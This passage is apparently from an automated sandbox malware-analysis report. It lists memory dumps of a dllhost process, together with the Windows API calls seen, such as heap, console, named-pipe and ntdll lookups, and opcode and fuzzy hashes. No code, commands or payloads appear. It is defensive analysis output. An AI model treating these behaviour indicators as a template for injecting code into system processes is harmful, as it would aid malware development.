                              • Instruction Fuzzy Hash: 76117211310FA191EB309BA5EE0935AE2A4FF64783F909026FE59C3794EF78D995C708
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: FileWrite$ConsoleErrorLastOutput
                              • String ID:
                              • API String ID: 2718003287-0
                              • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction ID: 618c4f346806f6869386af83dcdc8e4f1ba4afc516f53f157446461aeab3995e
                              • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction Fuzzy Hash: 53D1BA32714FA089EB21DFA5D84829C37B1F364B9AF404227DE5EA7B9ADA34C507C344
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: FileWrite$ConsoleErrorLastOutput
                              • String ID:
                              • API String ID: 2718003287-0
                              • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction ID: 916c2123a95a49aed1e549b66c05294aaf189c1b0e8d89b5fbac3fed83263e6a
                              • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction Fuzzy Hash: F3D1FE32714EA089E721CFE5DA482DCBBB1F364B9AF404216EE5D97B99DA34C14AC344
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$Free
                              • String ID:
                              • API String ID: 3168794593-0
                              • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction ID: f3c926fcb154368039c4aa6be254b0a2884a3c77f83800296fed4cdad50ce479
                              • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction Fuzzy Hash: 00012D32610FA0DAD724EFA6EC08149B7B1F798F82B054026EF5993714DF34D452C744
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$Free
                              • String ID:
                              • API String ID: 3168794593-0
                              • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                              • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                              • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                              • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$Free
                              • String ID:
                              • API String ID: 3168794593-0
                              • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction ID: 633be7a3032aa5a3373e2564ea9ff883b7623231e15c71257cb1ce93c69e09e7
                              • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction Fuzzy Hash: 7A012D72610FA0DAE724DFA6ED08149B7A1F798F82B058026FF4993714DF34E491C744
                              APIs
                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000025DC1AD28DF), ref: 0000025DC1AD2A12
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: ConsoleMode
                              • String ID:
                              • API String ID: 4145635619-0
                              • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction ID: 25f7d8e22d68b1abac157d67b62f7e3e32e360a8d8f0e3f80ed82a51c7449bde
                              • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction Fuzzy Hash: 3491DD32610F6189FB70EFA59C583AD2BA0F765B8BF444107DE4AA7B95DA34C487C708
                              APIs
                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000025DC1CF28DF), ref: 0000025DC1CF2A12
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: ConsoleMode
                              • String ID:
                              • API String ID: 4145635619-0
                              • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction ID: 67648c0bdd40e783fef39782d96d89ad398da7c6ebdc908b0bbc4235c970b7a5
                              • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction Fuzzy Hash: AB91D132610E6589FB70CFE59E593ADABA0F364B8BF444107FE4A97B85DA34C446C308
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 2933794660-0
                              • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction ID: e2d01f84e3ac2f34d540729beb0b603187f5b7d255d5c3a389b0a71bb7f3b9db
                              • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction Fuzzy Hash: 48115226710F148AEB10DFA1EC583A933B4F76976AF440E22EA6D877A4DF78C165C344
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 2933794660-0
                              • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction ID: 705fd1ff5d0669843429b365a9c5059f5dc909c3f28e1920570b520a5a953792
                              • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction Fuzzy Hash: E3115E26710F258AEB10CFA0EC583A833A4F72975AF441E22FB6D867A4DF78C154C344
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction ID: 72d8d41884776171b36e47a3191c3451492c59cfd896e26e9a0b8379c819140f
                              • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction Fuzzy Hash: DF719136200FA145EB74EEAA9C683EA67A4F7A57C7F404017DD49C7B88DE36C506C744
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction ID: c81fecac8d17b6f50fee18dea65fcd93d9562f06d8df1071b7c5dc8a0cde3255
                              • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction Fuzzy Hash: 2571B332200FA141E7359EA69E483AAE794FBA5BC7F445017FD09C3B88DE75C681C708
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritable__except_validate_context_record
                              • String ID: csm
                              • API String ID: 3242871069-1018135373
                              • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction ID: 1693f029ada729bddea1ff3700b2a2e728ee7475b29fe7eb031e7930e8343d8b
                              • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction Fuzzy Hash: 4151D532311F248ADB68CFA5D848B6C3391E364B9BF154126DA5A87788D779C8E3C704
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd
                              Similarity
                              • API ID: CallTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3163161869-2084237596
                              • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction ID: e748d60d31d589897fbb362e63f414ffb675fb37375e0d32c41f4194c54d8941
                              • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction Fuzzy Hash: 2461AF32504BC495EB70CF55E84439EB7A0F7A4B8AF044216EB8847B99DB7CC1D6CB08
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction ID: 15794ff91f761ea8eda75039f1b38ea34b964b176095a09625b8b641673c1e28
                              • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction Fuzzy Hash: E851C636204FA181EE34DEA9ACAC3AA6761F7E5783F444027DD5983B49DB3BC406C748
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction ID: dceac40239e2509856a1deddbcc73c2402383d07e58664e1961a40363e0c6cee
                              • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction Fuzzy Hash: 90512726244FA181E634CEA5EE5C3AAE751FBA8783F050027FD59C3B89DB39C584C748
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: ErrorFileLastWrite
                              • String ID: U
                              • API String ID: 442123175-4171548499
                              • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction ID: ab072a6ef71e85d4581bbc99c2cad0031f7bd7a7308479d1a0accccfed1d02fd
                              • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction Fuzzy Hash: 98410832615F9086E730DFA5E848799B7A0F368796F454123EE4DC7758EB38C402CB44
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: ErrorFileLastWrite
                              • String ID: U
                              • API String ID: 442123175-4171548499
                              • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction ID: 60064c6aa37c55ff05ffd7a15b45cffeb754c763f05f76282ecd3ed3c2d9374a
                              • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction Fuzzy Hash: A241C572625E9086E720DFA5E948799F7A0F368786F904123FE4DC7758EB38C441CB44
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: ExceptionFileHeaderRaise
                              • String ID: csm
                              • API String ID: 2573137834-1018135373
                              • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction ID: 57ec76b929c903c733ba1129e19c542e02797c6763f310cd21a0a78c9084acb8
                              • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction Fuzzy Hash: 27116D32214F9082EB61CF15F818249B7E1F798B86F584225EE8D47B64DF3DC552CB04
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: ExceptionFileHeaderRaise
                              • String ID: csm
                              • API String ID: 2573137834-1018135373
                              • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction ID: 82c24117e6fb5a8825db6d564521dd899b9fa4a66bd1cca9450c04df6417d324
                              • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction Fuzzy Hash: 57115B36214F9082EB208B55F908249B7E1FB98B86F584225EF8D47B64DF3CC591CB04
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: ntdll.dll
                              • API String ID: 1646373207-2227199552
                              • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                              • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                              • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                              • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID:
                              • API String ID: 756756679-0
                              • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction ID: 85407ee879b1079705a7b16661d2b25e22d96245c78d0ca4788dbf8a15dd403e
                              • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction Fuzzy Hash: BC11A121701F90D1EE25EBA6A80815967B0FB99FC3F584025EE4E93724DF39C443C304
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
